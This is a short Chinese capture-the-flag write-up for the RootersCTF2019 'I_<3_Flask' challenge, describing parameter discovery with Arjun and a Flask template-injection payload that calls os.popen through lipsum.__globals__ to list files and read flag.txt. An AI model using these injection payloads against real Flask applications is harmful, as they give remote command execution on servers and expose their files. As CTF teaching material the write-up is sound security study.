当前位置:网站首页>[RootersCTF2019]I_<3_Flask
[RootersCTF2019]I_<3_Flask
2022-07-26 22:39:00 【茶经新读.】
[RootersCTF2019]I_<3_Flask
一道比较简单的ssti题目,难点在于寻找注入的参数
发现了flask框架,寻找一下flask路由,f12没有发现什么东西,这里需要用到一个工具是Arjun,可以爆破我们所需要的参数:
下载:GitHub - s0md3v/Arjun: HTTP parameter discovery suite.
pip3 install arjun
python3 setup.py install
输入arjun -h查看版本,出现如下页面则安装成功:
arjun -u http://xxxxxxx.node4.buuoj.cn:81/ -c 100 -d 5
接下来直接利用flask的一个方法:lipsum
可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{ {lipsum.__globals__['os'].popen('ls').read()}}
然后构建payload:/?name={ {lipsum.__globals__['os'].popen('ls').read()}}
发现了flag.txt,直接用cat命令:
payload:/?name={ {lipsum.__globals__['os'].popen('cat flag.txt').read()}}
边栏推荐
- Mysql互不关联的联表查询(减少了查询的次数)
- Install redis-7.0.4 in Linux system
- [4.3 detailed explanation of Euler function]
- C语言 求素数、闰年以及最小公倍数最大公约数
- 2022_ SummerBlog_ 008
- CDs simulation of minimum dominating set based on MATLAB
- The crawler parses the object of the web page. Element name method
- The detailed process of reinstalling AutoCAD after uninstallation and deleting the registry
- 细说 call、apply 以及 bind 的区别和用法 20211031
- 关于Redis问题的二三事
猜你喜欢
JSCORE day_04(7.5)
【 Educational Codeforces Round 132 (Rated for Div. 2) A·B·C】
JSCORE day_02(7.1)
9_ Logistic regression
Helicopter control system based on Simulink
Crop TIF image
Comparative simulation of LEACH protocol performance, including the number of dead nodes, data transmission, network energy consumption, the number of cluster heads and load balance
Leetcode high frequency question: the choice of the inn, how many options to choose accommodation, to ensure that you can find a coffee shop with a minimum consumption of no more than p yuan in the ev
![[4.10 detailed explanation of game theory]](/img/df/690f9fb3adcb00317eb3438a76baaa.png)
[4.10 detailed explanation of game theory]
2020-12-20 九九乘法表
随机推荐
7_主成分分析法(Principal Component Analysis)
[PCB open source sharing] stc8a8k64d4 development board
动态联编和静态联编、以及多态
[2. TMUX operation]
DOM day_01(7.7) dom的介绍和核心操作
7_ Principal component analysis
输入一串字母 将里面的元音输出希望各位大佬能给指导
Blue Bridge Cup 1004 [recursive] cow story
放图仓库-2(函数图像)
On the expression of thymeleaf
八皇后 N皇后
[4.7 Gauss elimination details]
DOM day_ 03 (7.11) event bubbling mechanism, event delegation, to-do items, block default events, mouse coordinates, page scrolling events, create DOM elements, DOM encapsulation operations
2020-12-20 99 multiplication table
【4.10 博弈论详解】
[Qt]元对象系统
CDs simulation of minimum dominating set based on MATLAB
The company gave how to use the IP address (detailed version)
Find method of web page parsing by crawler
重学JSON.stringify